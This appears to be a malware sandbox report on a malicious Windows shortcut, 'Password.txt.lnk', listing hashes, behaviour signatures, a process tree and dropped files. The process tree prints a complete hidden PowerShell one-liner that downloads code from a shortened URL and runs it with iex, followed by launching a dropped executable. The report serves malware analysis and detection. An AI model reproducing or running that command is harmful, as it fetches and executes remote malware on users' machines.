Overview

overview

10

Static

static

Internet-Win7-30min

windows7_x64

10

Resubmissions

10-07-2020 14:55

200710-lvc7nhrjka 10

Analysis

  • max time kernel
    1290s
  • max time network
    1296s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    10-07-2020 14:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Password.txt.lnk

  • Size

    2KB

  • MD5

    1904661a50ba45dda55fd32a286dc7b3

  • SHA1

    d88c8c577002d4a36e7ff48844aa93e78f61191b

  • SHA256

    a3fcd479bb42a6f147eb27bd105de1d05adcaaf7f71c0ae2f432a44b4e554ce5

  • SHA512

    799530c6eea888523ee9f65ffea07746a3b1b68bf87c7ebea2e65bc09ad9f39de052e3dac4f8dbadcff79f16096510054360051c52724b828453ca08b28bad9f

Score
10/10
evasionspywaretrojan

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.ly/3eaY1TH

Signatures

  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Modifies system certificate store 2 TTPs 3 IoCs
    evasionspywaretrojan
  • Drops file in Windows directory 1 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Blacklisted process makes network request 4 IoCs
  • Executes dropped EXE 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Password.txt.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1492
    • C:\Windows\System32\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p C:\Windows /m hh.exe /c "powershell -nop -exec bypass -w hidden -c $a=new-object net.webclient;$a.proxy.credentials=[system.net.credentialcache]::defaultnetworkcredentials;$a.downloadstring('http://bit.ly/3eaY1TH')|iex"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:784
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        -nop -exec bypass -w hidden -c $a=new-object net.webclient;$a.proxy.credentials=[system.net.credentialcache]::defaultnetworkcredentials;$a.downloadstring('http://bit.ly/3eaY1TH')|iex
        3⤵
        • Modifies system certificate store
        • Drops file in Windows directory
        • Suspicious use of WriteProcessMemory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        • Blacklisted process makes network request
        PID:336
        • C:\Windows\system32\notepad.exe
          "C:\Windows\system32\notepad.exe" C:\Users\Admin\AppData\Local\Temp\Password.txt
          4⤵
          • Opens file in notepad (likely ransom note)
          PID:1508
        • C:\Users\Admin\AppData\Local\Temp\UpdateWorker.exe
          "C:\Users\Admin\AppData\Local\Temp\UpdateWorker.exe"
          4⤵
          • Executes dropped EXE
          PID:1700

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Password.txt
    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\UpdateWorker.exe
    Download Submit

  • memory/336-1-0x0000000000000000-mapping.dmp

    Download

  • memory/784-0-0x0000000000000000-mapping.dmp

    Download

  • memory/1508-2-0x0000000000000000-mapping.dmp

    Download

  • memory/1700-4-0x0000000000000000-mapping.dmp

    Download